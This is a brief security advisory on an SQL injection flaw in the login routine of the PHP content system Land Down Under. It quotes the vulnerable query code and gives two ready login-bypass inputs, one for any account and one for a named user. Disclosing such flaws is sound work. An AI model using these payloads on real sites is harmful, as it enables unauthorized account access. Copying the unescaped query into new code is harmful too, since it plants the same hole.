"What is Land Down Under?, some calls this a CMS (Content Management System), other a "Portal", or a "Website engine". It's a dumb machine, made of PHP files that stores and querying data in a MySQL database, and sends those data to clients as HTML pages, with the help of skin files (a.k.a. "templates")".
One of the product's PHP script can be exploited to gain unauthorized access. This is due to the fact the PHP script contains an SQL injection vulnerability.
Credit:
The information has been provided by gdayworld.
Land Down Under lacks basic security checking for user provided data, i.e. product does not make any attempt to apply slashes to any of the incoming data. Therefore an attacker can simply inject extra SQL statements to the original query.
Vulnerable code:
Here is where the actual vulnerable code exists (comments added by gdayworld): // More code above
if ($a=="check")
{
ldu_shield_protect();
$rusername = cv('rusername','P','TXT');
$rpassword = cv('rpassword','P','TXT');
$rmdpass = md5($rpassword);
$query="SELECT user_id, user_active, user_banned, user_banexpire, user_level, user_skin, user_lang FROM $db_users WHERE user_password='$rmdpass' AND user_name='$rusername'";
$sql = ldu_mysql_query($query);
// Continues to validate.
Exploit:
Using the form simply put in the fields "' OR 1=1 -- " (without the quotes). For a specific user, simply type "' OR user_name='USERNAME' -- " (without quotes)
